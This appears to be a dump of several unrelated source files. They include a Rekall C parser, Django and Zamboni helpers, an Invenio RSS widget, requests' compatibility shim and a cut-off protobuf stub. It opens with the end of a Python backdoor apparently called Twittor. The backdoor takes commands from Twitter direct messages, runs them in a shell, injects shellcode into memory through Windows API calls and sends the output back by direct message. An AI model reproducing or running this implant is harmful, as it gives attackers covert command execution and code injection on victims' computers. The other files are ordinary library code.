Exception.__init__(self, message)
self.errors = errors
#
# Decoding exception when decoding a message
#
class DecodingException(TwittorException):
"""
Exception when trying to decode a CommandOutput
"""
#
# Class to parse received Command
#
class CommandToExecute:
def __init__(self, message):
try:
data = json.loads(base64.b64decode(message))
self.data = data
self.sender = data['sender']
self.receiver = data['receiver']
self.cmd = data['cmd']
self.jobid = data['jobid']
except:
raise DecodingException('Error decoding message: %s' % message)
def is_for_me(self):
global MAC_ADDRESS
return MAC_ADDRESS == self.receiver or self.cmd == 'PING' and 'output' not in self.data
def retrieve_command(self):
return self.jobid, self.cmd
#
# Class to build Command to send
#
class CommandOutput:
def __init__(self, sender, receiver, output, jobid, cmd):
self.sender = sender
self.receiver = receiver
self.output = output
self.cmd = cmd
self.jobid = jobid
def build(self):
cmd = {'sender': self.sender,
'receiver': self.receiver,
'output': self.output,
'cmd': self.cmd,
'jobid': self.jobid}
return base64.b64encode(json.dumps(cmd))
#
# Execute shellcode on a separate thread
#
class ExecuteShellcode(threading.Thread):
def __init__(self, jobid, shellc):
threading.Thread.__init__(self)
self.shellc = shellc
self.jobid = jobid
self.daemon = True
self.start()
def run(self):
try:
shellcode = bytearray(self.shellc)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
except Exception as e:
print e
pass
#
# Execute Command on a separate thread
#
class ExecuteCommand(threading.Thread):
def __init__(self, jobid, cmd):
threading.Thread.__init__(self)
self.jobid = jobid
self.command = cmd
self.daemon = True
self.start()
def run(self):
if (self.command == 'PING'):
output = platform.platform()
else:
output = subprocess.check_output(self.command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
output_command = CommandOutput(MAC_ADDRESS, 'master', output, self.jobid, self.command)
api.send_direct_message(user=USERNAME, text=output_command.build())
#
# Listener to stream Twitter messages and intercept Direct Messages
#
class StdOutListener(StreamListener):
def on_data(self, status):
try:
data = json.loads(status)
if data['direct_message'] and data['direct_message']['sender_screen_name'] == USERNAME:
try:
cmd = CommandToExecute(data['direct_message']['text'])
if (cmd.is_for_me()):
jobid, cmd = cmd.retrieve_command()
print 'jobid: %s, cmd to execute: %s' % (jobid, cmd)
if (cmd.split(' ')[0] == 'shellcode'):
sc = base64.b64decode(cmd.split(' ')[1]).decode('string-escape')
ExecuteShellcode(jobid, sc)
else:
ExecuteCommand(jobid, cmd)
except:
pass
except:
print 'Did not manage to decode %s' % status
return True
def main():
global api
try:
auth = OAuthHandler(CONSUMER_TOKEN, CONSUMER_SECRET)
auth.secure = True
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = API(auth)
stream = Stream(auth, StdOutListener())
stream.userstream()
except BaseException as e:
print("Error in main()", e)
if __name__ == '__main__':
main()
| mit |
google/rekall | tools/layout_expert/layout_expert/parsers/c_parser.py | 1 | 18196 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2016 Google Inc. All Rights Reserved.
#
# Authors:
# Arkadiusz Socała <[email protected]>
# Michael Cohen <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""A module containing a parser intended for C header files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# pylint: disable=expression-not-assigned
# pylint: disable=pointless-statement
import pyparsing
from layout_expert.c_ast import c_ast
from layout_expert.lib import parsers
from layout_expert.parsers import expression_parser
from layout_expert.parsers import util
_LINE_END = pyparsing.LineEnd().suppress()
_ENUM = pyparsing.Keyword('enum')
_STRUCT = pyparsing.Keyword('struct')
_UNION = pyparsing.Keyword('union')
_COMPOUND_TYPE_KEYWORD = _ENUM | _STRUCT | _UNION
_TYPEDEF = pyparsing.Keyword('typedef').suppress().setName("typedef")
_DECLARATION_KEYWORD = (_COMPOUND_TYPE_KEYWORD | _TYPEDEF).suppress()
_VOLATILE = pyparsing.Keyword('volatile').suppress()
_EXTERN = pyparsing.Keyword('extern').suppress()
_STATIC = pyparsing.Keyword('static').suppress()
_INLINE = pyparsing.Keyword('inline').suppress()
_MAYBE_EXTERN = pyparsing.Optional(_EXTERN)
_MAYBE_VOLATILE = pyparsing.Optional(_VOLATILE)
_DO = pyparsing.Keyword('do').suppress()
_WHILE = pyparsing.Keyword('while').suppress()
_C_FLOW_KEYWORD = _DO | _WHILE
_SIGNED = pyparsing.Keyword('signed') | pyparsing.Keyword('__signed__')
_UNSIGNED = pyparsing.Keyword('unsigned')
_CHAR = pyparsing.Keyword('char')
_SHORT = pyparsing.Keyword('short')
_INT = pyparsing.Keyword('int')
_LONG = pyparsing.Keyword('long')
_LONG_LONG = _LONG + _LONG
_EQUALS = pyparsing.Word("=")
_NUMBER_TYPE_KEYWORD = (
_INT
| _LONG
| _CHAR
| _SHORT
| _UNSIGNED
| _SIGNED
| _LONG_LONG
)
_SEMICOLON = pyparsing.Literal(';').suppress()
_STAR = pyparsing.Literal('*')
_COMMA = pyparsing.Literal(',')
_OPEN_BRACKET = pyparsing.Literal('[').suppress()
_CLOSE_BRACKET = pyparsing.Literal(']').suppress()
_BRACKETS = (_OPEN_BRACKET + _CLOSE_BRACKET).suppress()
_OPEN_PARENTHESIS = pyparsing.Literal('(').suppress()
_CLOSE_PARENTHESIS = pyparsing.Literal(')').suppress()
_OPEN_CURLY = pyparsing.Literal('{').suppress()
_CLOSE_CURLY = pyparsing.Literal('}').suppress()
_COLON = pyparsing.Literal(':').suppress()
_COMA = pyparsing.Literal(',').suppress()
# Apparently GCC understands either form.
_ATTRIBUTE = (pyparsing.Keyword('__attribute__') |
pyparsing.Keyword('__attribute')).suppress()
_DOUBLE_OPEN_PARENTHESIS = _OPEN_PARENTHESIS + _OPEN_PARENTHESIS
_DOUBLE_CLOSE_PARENTHESIS = _CLOSE_PARENTHESIS + _CLOSE_PARENTHESIS
_KEYWORD = (
_DECLARATION_KEYWORD
| _C_FLOW_KEYWORD
| _NUMBER_TYPE_KEYWORD
| _ATTRIBUTE
)
class Parser(object):
"""A parser suitable for parsing C header files.
NOTE: We only support parsing the forms that result after trimming. See
trimming_parser._stuff_we_care_about() for a list of forms we care
about. This parse is used to parse snippets.
"""
def __init__(self, type_manager=None):
self.type_manager = type_manager
self.expression_parser = expression_parser.ExpressionParser(
type_manager=self.type_manager)
self.parser = self._program()
self.anonymous_id = 0
def parse(self, source):
pyparsing.ParserElement.enablePackrat()
result = self.parser.parseString(source, parseAll=True)[0]
pyparsing.ParserElement.disablePackrat()
return result
def _make_anonymous_type(self, object_type):
name = "%s __unknown_%s_%s" % (object_type, object_type,
self.anonymous_id)
self.anonymous_id += 1
return name
def _make_anonymous_field_name(self):
name = "u%s" % (self.anonymous_id)
self.anonymous_id += 1
return name
@util.pyparsing_debug
def _program(self):
return pyparsing.ZeroOrMore(
self._element()
| self._typedef()
).setParseAction(self._make_prog)
def _make_prog(self, t):
return c_ast.CProgram(t.asList())
@util.pyparsing_debug
def _typedef(self):
"""Detect a typedef expression.
e.g: typedef int t;
type ref->^^^ ^<---- type_instance
The type ref is the type that we be aliased. The type_instance is the
name of the new type. The new name can be decorated just like a field so
we use the same parser.
Examples: typedef int t[100]; <---- New type t is an array of int.
typedef int *foo; <---- New type foo is a pointer to int.
"""
return (
_TYPEDEF
+ self._maybe_attributes()("pre_attributes")
+ self._type_reference()("type_definition")
+ self._maybe_attributes()("post_attributes")
+ self._type_instance()("instance")
+ _SEMICOLON
).setParseAction(self._create_typedef)
def _create_typedef(self, tok):
type_definition = self._create_type_definition(
tok.type_definition, tok.instance)
typedef_name = tok.instance.type_instance_name.first
result = c_ast.CTypedef(name=typedef_name,
type_definition=type_definition)
result.add_attributes(tok.instance.attributes)
result.add_attributes(tok.pre_attributes)
result.add_attributes(tok.post_attributes)
# Tell the type manager about the types.
if result.name:
self.type_manager.add_type(result.name, result)
return result
def _create_type_definition(self, type_definition, field):
"""Creates the token definition from inspecting results in tok."""
# The initial type definition we detected.
definition = type_definition
# Is it a pointer to function?
if field.function_args:
if field.function_pointer:
definition = c_ast.CPointer(c_ast.CFunction())
else:
definition = c_ast.CFunction()
# We detected pointers - Add pointer references.
for _ in field.type_pointer:
definition = c_ast.CPointer(definition)
# We detected an array - add an array reference.
for expr in reversed(field.brackets_with_expression_inside):
# 0 length for an anonymous array (e.g. int a[]).
length = 0
if expr:
length = self.expression_parser.evaluate_string(expr)
definition = c_ast.CArray(
length=c_ast.CNumber(length),
type_definition=definition
)
return definition
@util.pyparsing_debug
def _element(self):
"""The parser for all elements."""
self.element = pyparsing.Forward()
self.element << (
(~_TYPEDEF) + (
# e.g. int x;
self._type_name_with_fields()
# e.g. struct s {};
| self._struct_definition_possibly_with_fields()
# e.g. enum foo { OPTION = 1 + 2; };
| self._enum_definition()
| pyparsing.OneOrMore(_SEMICOLON)
)
)
return self.element.setName("element")
@util.pyparsing_debug
def _enum_definition(self):
"""Detect an enum definition.
e.g.
enum foo {
OPTION_1: 1 + 2,
OPTION_2
}
"""
return (
_ENUM
+ pyparsing.Optional(self._identifier())("enum_name")
+ _OPEN_CURLY
+ pyparsing.ZeroOrMore(
pyparsing.Group(
self._identifier()("name")
+ pyparsing.Optional(
_EQUALS
# This allows us to get even invalid expressions.
+ pyparsing.SkipTo(pyparsing.Word(",}"))("expression")
)
+ pyparsing.Optional(_COMMA)
)
)("fields")
+ _CLOSE_CURLY
+ self._maybe_attributes()("attributes")
).setParseAction(self._process_enum_definition)
def _process_enum_definition(self, tok):
fields = []
for field in tok.fields:
if field.expression:
expression = self.expression_parser.parse(field.expression)
else:
expression = None
fields.append(c_ast.CEnumField(
name=field.name.first, value=expression))
name = tok.enum_name
if name:
name = "enum %s" % tok.enum_name.first
else:
name = self._make_anonymous_type("enum")
return c_ast.CTypeDefinition(
name=name, type_definition=c_ast.CEnum(
attributes=tok.attributes,
fields=fields, name=name))
@util.pyparsing_debug
def _struct_definition_possibly_with_fields(self):
"""Detect a struct/enum/union definition.
e.g.
struct foobar {
int v[100];
} __attribute__((packed))
"""
return (
(_STRUCT | _UNION)("type")
+ pyparsing.Optional(self._identifier())("type_name")
+ _OPEN_CURLY
+ pyparsing.ZeroOrMore(
self.element
)("fields")
+ _CLOSE_CURLY
+ self._maybe_attributes()("attributes")
).setParseAction(self._process_struct_definition)
def _process_struct_definition(self, tok):
if tok.type == "struct":
cls_type = c_ast.CStruct
elif tok.type == "enum":
cls_type = c_ast.CEnum
elif tok.type == "union":
cls_type = c_ast.CUnion
# Anonymous types have no real name, we generate one.
name = tok.type_name
if name:
name = "%s %s" % (tok.type, tok.type_name.first)
else:
name = self._make_anonymous_type(tok.type)
type_definition = cls_type(tok.fields, name=name)
type_definition.add_attributes(tok.attributes)
return c_ast.CTypeDefinition(
name=name, type_definition=type_definition)
@util.pyparsing_debug
def _type_name_with_fields(self):
"""Detect type name definitions.
e.g. int v1;
type_t v2, v3;
type refs ^^^^ ^^^ type_instances
Returns:
a list of CField() instances
"""
return (
self._type_reference()("type_definition")
+ self._maybe_attributes()("attributes")
+ pyparsing.delimitedList(
self._type_instance()
)("field")
).setParseAction(self._create_type_name_with_fields)
def _create_type_name_with_fields(self, tok):
"""Creates CField() list from parsed token."""
result = []
for field in tok["field"]:
field.type_definition = tok.type_definition
bit_size = None
if field.bitfield:
bit_size = self.expression_parser.parse(field.bitfield)
type_definition = self._create_type_definition(
tok.type_definition, field)
field_ast = c_ast.CField(
name=field.type_instance_name.first,
bit_size=bit_size,
attributes=tok.attributes,
type_definition=type_definition)
field_ast.add_attributes(field.attributes)
result.append(field_ast)
return result
@util.pyparsing_debug
def _type_reference(self):
"""A reference to a type.
The type may be already defined in place or just referred by name.
"""
identifier = (
self._typeof_expression()
# Inline struct definition.
# e.g. struct { int x; } foo;
| self._struct_definition_possibly_with_fields()
| self._enum_definition()
| self._numeric_type_identifier()
| self._compound_type_identifier()
| self._identifier()
)
return (
pyparsing.ZeroOrMore(_VOLATILE)
+ identifier
).setParseAction(self._create_type_reference)
def _create_type_reference(self, tok):
if len(tok.type_definition) > 1:
return c_ast.CTypeReference(" ".join(tok.type_definition.asList()))
type_name = tok.type_definition.first
if isinstance(type_name, c_ast.CTypeDefinition):
return type_name
return c_ast.CTypeReference(type_name)
@util.pyparsing_debug
def _type_instance(self):
"""A type declaration.
The modifiers of a typedef:
struct s *P[];
^^^^<- The type instance.
"""
type_instance = (
# Function pointer (*f)(int foobar)
pyparsing.ZeroOrMore(_STAR)
+ _OPEN_PARENTHESIS
+ pyparsing.Optional(_STAR("function_pointer"))
+ self._identifier()("type_instance_name")
+ _CLOSE_PARENTHESIS
+ parsers.anything_in_parentheses()("function_args")
) | (
# Function object f(foo bar *)
pyparsing.ZeroOrMore(_STAR)
+ self._identifier()("type_instance_name")
+ parsers.anything_in_parentheses()("function_args")
) | (
# Simple form: *foo[10];
pyparsing.ZeroOrMore(_STAR)("type_pointer")
+ self._identifier()("type_instance_name")
# Possibly array: [] , [][]
+ pyparsing.ZeroOrMore(
_OPEN_BRACKET
+ pyparsing.SkipTo(_CLOSE_BRACKET)(
"brackets_with_expression_inside*")
+ _CLOSE_BRACKET)
# Bitfields: int x: 7;
+ pyparsing.Optional(
_COLON
+ pyparsing.SkipTo(
_SEMICOLON | _COMMA)("bitfield")
)
)
return pyparsing.Group(
type_instance
+ self._maybe_attributes()
)
@util.pyparsing_debug
def _maybe_attributes(self):
"""Possibly match some attributes.
The syntax of attributes is described here:
https://gcc.gnu.org/onlinedocs/gcc/Attribute-Syntax.html
"""
return pyparsing.Group(
pyparsing.ZeroOrMore(
_ATTRIBUTE
+ _DOUBLE_OPEN_PARENTHESIS
+ pyparsing.delimitedList(
pyparsing.Group(
self._identifier()("name")
+ pyparsing.Optional(
_OPEN_PARENTHESIS
+ parsers.anything_beetween("()")("args")
+ _CLOSE_PARENTHESIS
)
)
)
+ _DOUBLE_CLOSE_PARENTHESIS
).setParseAction(self._make_attribute)
)("attributes")
def _make_attribute(self, tok):
"""Compose a c_ast.CAttribute() object for each attribute."""
result = []
for attr_specifier in tok:
expression = []
if attr_specifier.args:
# Try to parse the expression if possible.
try:
expression = [self.expression_parser.parse(
attr_specifier.args)]
except pyparsing.ParseException:
pass
result.append(c_ast.CAttribute(
attr_specifier.name.first,
*expression))
return result
@util.pyparsing_debug
def _typeof_expression(self):
keyword = (
pyparsing.Keyword('typeof')
| pyparsing.Keyword('__typeof__')
)
return pyparsing.Combine(
keyword
+ pyparsing.Literal('(')
+ parsers.anything_beetween('()')
+ pyparsing.Literal(')')
)
@util.action
def _create_typeof_expression(self, keyword, *arguments):
return c_ast.CFunctionCall(
function_name=keyword,
arguments=arguments,
)
@util.pyparsing_debug
def _numeric_type_identifier(self):
with_sign_identifier = (
self._number_sign_identifier()
+ pyparsing.Optional(self._number_size_identifier())
)
with_size_identifier = (
pyparsing.Optional(self._number_sign_identifier())
+ self._number_size_identifier()
)
return with_sign_identifier | with_size_identifier
@util.pyparsing_debug
def _compound_type_identifier(self):
return(
(_ENUM | _STRUCT | _UNION)
+ self._identifier()
)
@util.pyparsing_debug
def _number_sign_identifier(self):
return _SIGNED | _UNSIGNED
@util.pyparsing_debug
def _number_size_identifier(self):
may_have_int_suffix = _LONG_LONG | _SHORT | _LONG
return _INT | _CHAR | (may_have_int_suffix + pyparsing.Optional(_INT))
@util.pyparsing_debug
def _identifier(self):
proper_identifier = pyparsing.Word(
pyparsing.alphas + '_',
pyparsing.alphanums + '_',
)
return (
(~_KEYWORD)
+ proper_identifier
)
@util.pyparsing_debug
def _natural(self):
return pyparsing.Word(pyparsing.nums).setParseAction(util.action(int))
| gpl-2.0 |
elysium001/zamboni | mkt/comm/forms.py | 1 | 2741 | from django import forms
from django.conf import settings
from django.forms import ValidationError
import happyforms
from jinja2.filters import do_filesizeformat
from tower import ugettext as _, ugettext_lazy as _lazy
from mkt.api.forms import SluggableModelChoiceField
from mkt.comm.models import CommunicationThread
from mkt.constants import comm
from mkt.extensions.models import Extension
from mkt.webapps.models import Webapp
class AppSlugForm(happyforms.Form):
app = SluggableModelChoiceField(queryset=Webapp.with_deleted.all(),
sluggable_to_field_name='app_slug')
class ExtensionSlugForm(happyforms.Form):
extension = SluggableModelChoiceField(queryset=Extension.objects.all(),
sluggable_to_field_name='slug')
class CreateCommNoteForm(happyforms.Form):
body = forms.CharField(
error_messages={'required': _lazy('Note body is empty.')})
note_type = forms.TypedChoiceField(
empty_value=comm.NO_ACTION,
coerce=int, choices=[(x, x) for x in comm.API_NOTE_TYPE_ALLOWED],
error_messages={'invalid_choice': _lazy(u'Invalid note type.')})
class CreateCommThreadForm(CreateCommNoteForm):
app = SluggableModelChoiceField(queryset=Webapp.with_deleted.all(),
sluggable_to_field_name='app_slug')
version = forms.CharField()
def clean_version(self):
version_num = self.cleaned_data['version']
versions = self.cleaned_data['app'].versions.filter(
version=version_num).order_by('-created')
if versions.exists():
return versions[0]
raise forms.ValidationError(
_('Version %s does not exist' % version_num))
class CommAttachmentForm(happyforms.Form):
attachment = forms.FileField(label=_lazy(u'Attachment:'))
description = forms.CharField(required=False, label=_lazy(u'Description:'))
max_upload_size = settings.MAX_REVIEW_ATTACHMENT_UPLOAD_SIZE
def clean(self, *args, **kwargs):
data = super(CommAttachmentForm, self).clean(*args, **kwargs)
attachment = data.get('attachment')
max_size = self.max_upload_size
if attachment and attachment.size > max_size:
# L10n: error raised when review attachment is too large.
exc = _('Attachment exceeds maximum size of %s.' %
do_filesizeformat(self.max_upload_size))
raise ValidationError(exc)
return data
CommAttachmentFormSet = forms.formsets.formset_factory(CommAttachmentForm)
class UnCCForm(happyforms.Form):
pk = SluggableModelChoiceField(
queryset=CommunicationThread.objects.all(),
sluggable_to_field_name='id')
| bsd-3-clause |
edisonlz/fruit | web_project/base/site-packages/django/contrib/gis/utils/wkt.py | 219 | 1880 | """
Utilities for manipulating Geometry WKT.
"""
from django.utils import six
def precision_wkt(geom, prec):
"""
Returns WKT text of the geometry according to the given precision (an
integer or a string). If the precision is an integer, then the decimal
places of coordinates WKT will be truncated to that number:
>>> pnt = Point(5, 23)
>>> pnt.wkt
'POINT (5.0000000000000000 23.0000000000000000)'
>>> precision(geom, 1)
'POINT (5.0 23.0)'
If the precision is a string, it must be valid Python format string
(e.g., '%20.7f') -- thus, you should know what you're doing.
"""
if isinstance(prec, int):
num_fmt = '%%.%df' % prec
elif isinstance(prec, six.string_types):
num_fmt = prec
else:
raise TypeError
# TODO: Support 3D geometries.
coord_fmt = ' '.join([num_fmt, num_fmt])
def formatted_coords(coords):
return ','.join([coord_fmt % c[:2] for c in coords])
def formatted_poly(poly):
return ','.join(['(%s)' % formatted_coords(r) for r in poly])
def formatted_geom(g):
gtype = str(g.geom_type).upper()
yield '%s(' % gtype
if gtype == 'POINT':
yield formatted_coords((g.coords,))
elif gtype in ('LINESTRING', 'LINEARRING'):
yield formatted_coords(g.coords)
elif gtype in ('POLYGON', 'MULTILINESTRING'):
yield formatted_poly(g)
elif gtype == 'MULTIPOINT':
yield formatted_coords(g.coords)
elif gtype == 'MULTIPOLYGON':
yield ','.join(['(%s)' % formatted_poly(p) for p in g])
elif gtype == 'GEOMETRYCOLLECTION':
yield ','.join([''.join([wkt for wkt in formatted_geom(child)]) for child in g])
else:
raise TypeError
yield ')'
return ''.join([wkt for wkt in formatted_geom(geom)])
| apache-2.0 |
KyoungRan/Django_React_ex | Django_React_Workshop-mbrochh/django/myvenv/lib/python3.4/site-packages/django/views/decorators/csrf.py | 586 | 2202 | from functools import wraps
from django.middleware.csrf import CsrfViewMiddleware, get_token
from django.utils.decorators import available_attrs, decorator_from_middleware
csrf_protect = decorator_from_middleware(CsrfViewMiddleware)
csrf_protect.__name__ = "csrf_protect"
csrf_protect.__doc__ = """
This decorator adds CSRF protection in exactly the same way as
CsrfViewMiddleware, but it can be used on a per view basis. Using both, or
using the decorator multiple times, is harmless and efficient.
"""
class _EnsureCsrfToken(CsrfViewMiddleware):
# We need this to behave just like the CsrfViewMiddleware, but not reject
# requests or log warnings.
def _reject(self, request, reason):
return None
requires_csrf_token = decorator_from_middleware(_EnsureCsrfToken)
requires_csrf_token.__name__ = 'requires_csrf_token'
requires_csrf_token.__doc__ = """
Use this decorator on views that need a correct csrf_token available to
RequestContext, but without the CSRF protection that csrf_protect
enforces.
"""
class _EnsureCsrfCookie(CsrfViewMiddleware):
def _reject(self, request, reason):
return None
def process_view(self, request, callback, callback_args, callback_kwargs):
retval = super(_EnsureCsrfCookie, self).process_view(request, callback, callback_args, callback_kwargs)
# Forces process_response to send the cookie
get_token(request)
return retval
ensure_csrf_cookie = decorator_from_middleware(_EnsureCsrfCookie)
ensure_csrf_cookie.__name__ = 'ensure_csrf_cookie'
ensure_csrf_cookie.__doc__ = """
Use this decorator to ensure that a view sets a CSRF cookie, whether or not it
uses the csrf_token template tag, or the CsrfViewMiddleware is used.
"""
def csrf_exempt(view_func):
"""
Marks a view function as being exempt from the CSRF view protection.
"""
# We could just do view_func.csrf_exempt = True, but decorators
# are nicer if they don't have side-effects, so we return a new
# function.
def wrapped_view(*args, **kwargs):
return view_func(*args, **kwargs)
wrapped_view.csrf_exempt = True
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
| mit |
ashhher3/invenio | modules/webjournal/lib/elements/bfe_webjournal_rss.py | 25 | 5765 | # -*- coding: utf-8 -*-
## $Id: bfe_webjournal_widget_whatsNew.py,v 1.24 2009/01/27 07:25:12 jerome Exp $
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebJournal widget - Display the index of the lastest articles,
including 'breaking news'.
"""
from invenio.webjournal_utils import \
parse_url_string, \
get_journal_categories, \
get_category_query
from invenio.messages import gettext_set_language
from invenio.config import CFG_SITE_URL
from invenio.urlutils import create_html_link
from invenio.dbquery import run_sql
from urllib import quote
def format_element(bfo, categories, label="Subscribe by RSS",
rss_icon_url="/img/rss.png", cc='', css_class="rssLink",
rss_icon_width='16px', rss_icon_height='16px'):
"""
Display RSS links to journal articles, in one or several
categories, or to the whole journal (if 'cc' parameter is used).
Note about 'cc': if we want an RSS of *all* articles (whathever
the category is), either we build an RSS url to each of the
categories/collections of the journal, or we simply link to the
main collection ('cc') of the journal (which implies that journal
categories exist as sub-collections of 'cc'). The second option is
preferred.
@param categories: comma-separated list of journal categories that will be linked from this RSS. If 'all', use all. If empty, try to use current category.
@param label: label of the RSS link
@param rss_icon_url: if provided, display the RSS icon in front of the label
@param rss_icon_width: if provided, declared width for the RSS icon
@param rss_icon_height: if provided, declared height for the RSS icon
@param cc: if provided, use as root collection for the journal, and ignore 'categories' parameter.
@param css_class: CSS class of the RSS link.
"""
args = parse_url_string(bfo.user_info['uri'])
category_name = args["category"]
journal_name = args["journal_name"]
ln = bfo.lang
_ = gettext_set_language(ln)
if cc:
categories = []
elif categories.lower() == 'all':
categories = get_journal_categories(journal_name)
elif not categories and category_name:
categories = [category_name]
else:
categories = categories.split(',')
# Build the query definition for selected categories. If a
# category name can a match collection name, we can simply search
# in this collection. Otherwise we have to search using the query
# definition of the category.
# Note that if there is one category that does not match a
# collection name, we have to use collections queries for all
# categories (we cannot display all records of a collection +
# apply search constraint on other collections)
collections = []
pattern = []
must_use_pattern = False
for category in categories:
dbquery = get_category_query(journal_name, category)
if dbquery:
pattern.append(dbquery)
res = None
if not must_use_pattern:
res = run_sql("SELECT name FROM collection WHERE dbquery=%s",
(dbquery,))
if res:
collections.append(res[0][0])
else:
# Could not find corresponding collection. Maybe
# replace '980__a' by 'collection'?
if not must_use_pattern:
res = run_sql("SELECT name FROM collection WHERE dbquery=%s",
(dbquery.replace('980__a', 'collection'),))
if res:
collections.append(res[0][0])
else:
# Really no matching collection name
# apparently. Use query definition.
must_use_pattern = True
# Build label
link_label = ''
if rss_icon_url:
if rss_icon_url.startswith('/'):
# Build an absolute URL
rss_icon_url = CFG_SITE_URL + rss_icon_url
link_label += '<img src="%s" alt="RSS" border="0"%s%s/> ' % \
(rss_icon_url, rss_icon_width and ' width="%s"' % rss_icon_width or '',
rss_icon_height and ' height="%s"' % rss_icon_height or '')
if label:
link_label += _(label)
# Build link
rss_url = CFG_SITE_URL + '/rss'
if cc:
rss_url += '?cc=' + quote(cc)
elif must_use_pattern:
rss_url += '?p=' + quote(' or '.join(pattern))
else:
rss_url += '?c=' + '&c='.join([quote(coll) \
for coll in collections])
rss_url += '&ln=' + ln
return create_html_link(rss_url, {},
link_label=link_label,
linkattrd={'class': css_class})
def escape_values(bfo):
"""
Called by BibFormat in order to check if output of this element
should be escaped.
"""
return 0
_ = gettext_set_language('en')
dummy = _("Subscribe by RSS")
| gpl-2.0 |
dltn/tortellini | server-firmware/Processing/DataPusher/requests/compat.py | 101 | 2600 | # -*- coding: utf-8 -*-
"""
pythoncompat
"""
from .packages import chardet
import sys
# -------
# Pythons
# -------
# Syntax sugar.
_ver = sys.version_info
#: Python 2.x?
is_py2 = (_ver[0] == 2)
#: Python 3.x?
is_py3 = (_ver[0] == 3)
#: Python 3.0.x
is_py30 = (is_py3 and _ver[1] == 0)
#: Python 3.1.x
is_py31 = (is_py3 and _ver[1] == 1)
#: Python 3.2.x
is_py32 = (is_py3 and _ver[1] == 2)
#: Python 3.3.x
is_py33 = (is_py3 and _ver[1] == 3)
#: Python 3.4.x
is_py34 = (is_py3 and _ver[1] == 4)
#: Python 2.7.x
is_py27 = (is_py2 and _ver[1] == 7)
#: Python 2.6.x
is_py26 = (is_py2 and _ver[1] == 6)
#: Python 2.5.x
is_py25 = (is_py2 and _ver[1] == 5)
#: Python 2.4.x
is_py24 = (is_py2 and _ver[1] == 4) # I'm assuming this is not by choice.
# ---------
# Platforms
# ---------
# Syntax sugar.
_ver = sys.version.lower()
is_pypy = ('pypy' in _ver)
is_jython = ('jython' in _ver)
is_ironpython = ('iron' in _ver)
# Assume CPython, if nothing else.
is_cpython = not any((is_pypy, is_jython, is_ironpython))
# Windows-based system.
is_windows = 'win32' in str(sys.platform).lower()
# Standard Linux 2+ system.
is_linux = ('linux' in str(sys.platform).lower())
is_osx = ('darwin' in str(sys.platform).lower())
is_hpux = ('hpux' in str(sys.platform).lower()) # Complete guess.
is_solaris = ('solar==' in str(sys.platform).lower()) # Complete guess.
try:
import simplejson as json
except (ImportError, SyntaxError):
# simplejson does not support Python 3.2, it thows a SyntaxError
# because of u'...' Unicode literals.
import json
# ---------
# Specifics
# ---------
if is_py2:
from urllib import quote, unquote, quote_plus, unquote_plus, urlencode, getproxies, proxy_bypass
from urlparse import urlparse, urlunparse, urljoin, urlsplit, urldefrag
from urllib2 import parse_http_list
import cookielib
from Cookie import Morsel
from StringIO import StringIO
from .packages.urllib3.packages.ordered_dict import OrderedDict
builtin_str = str
bytes = str
str = unicode
basestring = basestring
numeric_types = (int, long, float)
elif is_py3:
from urllib.parse import urlparse, urlunparse, urljoin, urlsplit, urlencode, quote, unquote, quote_plus, unquote_plus, urldefrag
from urllib.request import parse_http_list, getproxies, proxy_bypass
from http import cookiejar as cookielib
from http.cookies import Morsel
from io import StringIO
from collections import OrderedDict
builtin_str = str
str = str
bytes = bytes
basestring = (str, bytes)
numeric_types = (int, float)
| mit |
Mickey32111/pogom | pogom/pgoapi/protos/POGOProtos/Settings/Master/Item/EggIncubatorAttributes_pb2.py | 16 | 3599 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Settings/Master/Item/EggIncubatorAttributes.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Inventory import EggIncubatorType_pb2 as POGOProtos_dot_Inventory_dot_EggIncubatorType__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Settings/Master/Item/EggIncubatorAttributes.proto',
package='POGOProtos.Settings.Master.Item',
syntax='proto3',
